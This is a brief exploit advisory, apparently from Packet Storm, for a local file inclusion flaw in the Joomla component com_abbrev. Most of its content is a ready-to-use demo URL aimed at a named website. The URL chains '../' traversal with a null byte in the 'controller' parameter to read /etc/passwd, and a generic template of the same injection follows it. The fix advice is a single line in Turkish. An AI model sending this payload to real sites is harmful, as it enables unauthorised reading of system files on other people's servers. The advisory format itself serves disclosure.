Joomla Abbrev Local File Inclusion

2010-01-01T00:00:00
ID PACKETSTORM:84643
Type packetstorm
Reporter Fl0riX
Modified 2010-01-01T00:00:00

Description

                                        
                                            `  
<------------------- header data start ------------------- >  
  
[++] Joomla Component com_abbrev Local File Inclusion Vulnerability   
  
  
[++] author : FL0RiX  
  
[++] Name : com_abbrev  
  
[++] Bug Type : Local File Inclusion  
  
[++] Demo Vuln. :  
  
  
[++] http://observal.net/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00  
  
[++] Bug Fix Advice : Zararlý karakterler filtrelenmelidir.  
  
[++] Note : LFI/RFI Uzmaný Zannedenler Localda Aramazlar :)  
  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
path/index.php?option=com_abbrev&controller=[-LFI-]  
  
< -- bug code end of -- >  
  
  
_________________________________________________________________  
Windows Live Hotmail: Arkadaþlarýnýz Facebook'taki güncellemelerinizi doðrudan Hotmail®'den alýr.  
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_4:092009`